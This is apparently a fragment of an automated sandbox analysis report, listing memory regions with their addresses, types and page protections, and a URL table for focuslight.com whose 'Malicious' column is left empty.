|
6F8B000
|
stack
|
page read and write
|
||
|
2985000
|
heap
|
page read and write
|
||
|
BEE000
|
stack
|
page read and write
|
||
|
905000
|
heap
|
page read and write
|
||
|
993000
|
heap
|
page read and write
|
||
|
55D6000
|
heap
|
page read and write
|
||
|
5517000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
968000
|
heap
|
page read and write
|
||
|
70109000
|
unkown
|
page readonly
|
||
|
137D000
|
heap
|
page read and write
|
||
|
E90000
|
heap
|
page read and write
|
||
|
F92000
|
unkown
|
page readonly
|
||
|
1132A000
|
unkown
|
page readonly
|
||
|
112DE000
|
unkown
|
page readonly
|
||
|
11287000
|
unkown
|
page readonly
|
||
|
55F7000
|
heap
|
page read and write
|
||
|
998000
|
heap
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
There are 519 hidden memdumps, click here to show them.
DOM / HTML
|
URL
|
Malicious
|
|
|---|---|---|
|
https://www.focuslight.com/
|
|
|
|
https://www.focuslight.com/
|
||
|
https://www.focuslight.com/
|